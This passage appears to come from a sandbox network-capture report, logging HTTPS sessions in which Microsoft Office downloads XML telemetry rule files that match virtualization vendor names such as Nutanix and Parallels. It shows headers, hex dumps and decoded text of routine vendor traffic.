                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    85192.168.2.44983513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:23 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 477
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                    x-ms-request-id: e297b188-201e-0000-7a1b-41a537000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103523Z-174f7845968vqt9xhC1EWRgten00000011cg000000003b6e
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    86192.168.2.44983613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:23 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                    x-ms-request-id: 926e5261-401e-008c-1d9e-4286c2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103523Z-174f78459684db9fhC1EWRc7g400000001900000000064z1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    87192.168.2.44983713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:23 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:24 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 477
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                    x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103523Z-174f7845968kvnqxhC1EWRmf3g0000000n00000000008xrx
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    88192.168.2.44983813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:24 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                    x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103525Z-174f78459685m244hC1EWRgp2c0000001180000000000pht
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    89192.168.2.44983913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:25 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:26 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                    x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103525Z-174f78459684bddphC1EWRbht40000001120000000003x79
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    90192.168.2.44984113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:25 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:26 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:26 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 485
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                    x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103526Z-174f7845968zgtf6hC1EWRqd8s0000000ubg000000000wzg
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:26 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    91192.168.2.44984213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:26 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:26 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 411
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                    x-ms-request-id: b10bd460-301e-0096-2d05-41e71d000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103526Z-174f7845968nxc96hC1EWRspw80000001110000000005msv
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:26 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    92192.168.2.44984313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:27 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 470
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                    x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103527Z-174f7845968j6t2phC1EWRcfe800000011cg000000009g5u
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    93192.168.2.44984413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:27 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:28 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:28 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                    x-ms-request-id: 28cbb195-f01e-0096-56fa-4110ef000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103528Z-174f7845968ljs8phC1EWRe6en000000112g000000007rmn
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    94192.168.2.44984513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:28 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:28 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:28 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 502
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                    x-ms-request-id: 25536d4f-c01e-007a-0caa-42b877000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103528Z-174f7845968px8v7hC1EWR08ng00000011p0000000001186
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:28 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    95192.168.2.44984613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:28 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:28 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:28 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 407
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                    ETag: "0x8DC582B9D30478D"
                                                                                                                    x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000
                                                                                                                    x-ms-version: 2018-03-28
